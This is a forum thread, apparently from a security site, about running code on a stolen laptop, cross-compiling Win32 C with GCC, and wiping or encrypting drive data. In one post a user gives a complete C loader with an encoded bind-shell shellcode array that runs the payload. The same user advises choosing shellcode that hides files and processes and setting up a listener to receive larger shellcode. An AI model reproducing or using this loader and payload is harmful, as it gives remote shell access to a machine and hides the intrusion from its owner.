Virchanza, No I was not being sarcasticOriginally Posted by Virchanza
My C is pretty poor and I was honestly asking the question. I cant figure out what package I need which contains the win32 libs for my system.
I am no expert either but from the comment of his post where he says you can goto metasploit and use any shellcode I like, well I can use any shellcode I like.
Virchanza, No I was not being sarcastic
The laptop that was stolen has Windows on it, so Compaq posted code to be compiled to an executable file that will run on Windows.Virchanza, No I was not being sarcastic
Win32 refers to "Microsoft Windows 32-Bit", you won't be able to get the library for Linux. (And thankfully so).
The Win32 Application Programming Interface (API for short), is the set of functions that a Win32 function can use to do stuff in Windows. For instance, if I wanted to make a message box appear in Windows, I could call the "MessageBoxW" function which is a part of the Win32 API.
Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".
There's probably a way to get dban to run on boot. It runs in memory, so once it's running it won't need the drive anymore. Though it's already been said, the info has probably been pulled already.
Of course, if you really wanted to have some fun, go to Wal-Mart late at night and ask the greeter if they could help you find trashbags, roll of carpet, rope, quicklime, clorox and a shovel. See if they give you any strange looks. --Streaker69
I understand all of that just fine but I was under the impression that C code with the winsock2.h and windows.h could still be compiled with GCC in order to run on a windows machine. What I mean is if I only had a *nix box and I wanted to compile this to upload to a windows box. Is there no way to do that in GCC. I understand its a windows executable.
OK, I'm with you
What you're referring to is known as "cross-compilation". Cross-compilation is where you use Computer Type A to compile a program that will run on Computer Type B. So for instance, if you compiled a Windows program using a compiler on a Linux machine, that would be cross-compilation.
The only cross-compilation I've ever done is using my laptop to compile a program for an 8-Bit microcontroller :P
Here's an excerpt from Wikipedia http://en.wikipedia.org/wiki/Cross-compiling:
"GCC, a free software collection of compilers, can be set up to cross compile. It supports many platforms and languages. However, due to limited volunteer time and the huge amount of work it takes to maintain working cross compilers, in many releases some of the cross compilers are broken."
Ask questions on the open forums, that way everybody benefits from the solution, and everybody can be corrected when they make mistakes. Don't send me private messages asking questions that should be asked on the open forums, I won't respond. I decline all "Friend Requests".
The last line that loads the shellcode should(havn't tested) run in linux with gcc, the coulpe lines above don't need to be there as the shellcode from metasploit will inizlates the sockets, but hidden the window with the top two lines is windows only, i don't know the code for linux(but they don't need to be there. Use shellcode for linux and it should work.I understand all of that just fine but I was under the impression that C code with the winsock2.h and windows.h could still be compiled with GCC in order to run on a windows machine. What I mean is if I only had a *nix box and I wanted to compile this to upload to a windows box. Is there no way to do that in GCC. I understand its a windows executable.
linux code
Another note if you set this up with a socket listener you could ask for the attacker to send shellcode, and get it to run larger shellcode say you can only use a small shellcode with exploit.Code:#include <stdio.h> unsigned char bindcode[] = ////////////////get linux shell code "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xce" "\x25\x78\x47\x83\xeb\xfc\xe2\xf4\x32\x4f\x93\x0a\x26\xdc\x87\xb8" "\x31\x45\xf3\x2b\xea\x01\xf3\x02\xf2\xae\x04\x42\xb6\x24\x97\xcc" "\x81\x3d\xf3\x18\xee\x24\x93\x0e\x45\x11\xf3\x46\x20\x14\xb8\xde" "\x62\xa1\xb8\x33\xc9\xe4\xb2\x4a\xcf\xe7\x93\xb3\xf5\x71\x5c\x6f" "\xbb\xc0\xf3\x18\xea\x24\x93\x21\x45\x29\x33\xcc\x91\x39\x79\xac" "\xcd\x09\xf3\xce\xa2\x01\x64\x26\x0d\x14\xa3\x23\x45\x66\x48\xcc" "\x8e\x29\xf3\x37\xd2\x88\xf3\x07\xc6\x7b\x10\xc9\x80\x2b\x94\x17" "\x31\xf3\x1e\x14\xa8\x4d\x4b\x75\xa6\x52\x0b\x75\x91\x71\x87\x97" "\xa6\xee\x95\xbb\xf5\x75\x87\x91\x91\xac\x9d\x21\x4f\xc8\x70\x45" "\x9b\x4f\x7a\xb8\x1e\x4d\xa1\x4e\x3b\x88\x2f\xb8\x18\x76\x2b\x14" "\x9d\x76\x3b\x14\x8d\x76\x87\x97\xa8\x4d\x7c\x05\xa8\x76\xf1\xa6" "\x5b\x4d\xdc\x5d\xbe\xe2\x2f\xb8\x18\x4f\x68\x16\x9b\xda\xa8\x2f" "\x6a\x88\x56\xae\x99\xda\xae\x14\x9b\xda\xa8\x2f\x2b\x6c\xfe\x0e" "\x99\xda\xae\x17\x9a\x71\x2d\xb8\x1e\xb6\x10\xa0\xb7\xe3\x01\x10" "\x31\xf3\x2d\xb8\x1e\x43\x12\x23\xa8\x4d\x1b\x2a\x47\xc0\x12\x17" "\x97\x0c\xb4\xce\x29\x4f\x3c\xce\x2c\x14\xb8\xb4\x64\xdb\x3a\x6a" "\x30\x67\x54\xd4\x43\x5f\x40\xec\x65\x8e\x10\x35\x30\x96\x6e\xb8" "\xbb\x61\x87\x91\x95\x72\x2a\x16\x9f\x74\x12\x46\x9f\x74\x2d\x16" "\x31\xf5\x10\xea\x17\x20\xb6\x14\x31\xf3\x12\xb8\x31\x12\x87\x97" "\x45\x72\x84\xc4\x0a\x41\x87\x91\x9c\xda\xa8\x2f\x3e\xaf\x7c\x18" "\x9d\xda\xae\xb8\x1e\x25\x78\x47"; int main() { ((void (*)(void)) &bindcode)(); ////////////the program will stay running when it loads bindcode, use shellcode that will hide files and process. }
Cool. Thanks for clearing it up.
Hi All,
I am not an expert in this area, but simple drive wipes might still be recoverable using disk forensic tools. Would it be feasible to encrypt the data in place and destroy the crypto key as an alternative?
Just an idea.
Since the data already was stored once in plain unencrypted format it would be just as recoverable after this as after simply being destroyed in the first place. Or actually that is incorrect, as you are suggesting to simply destroy the encryption key the actual data would still remain and you would in addition have the option to bruteforce the key to recover the data.
-Monkeys are like nature's humans.
Posting Permissions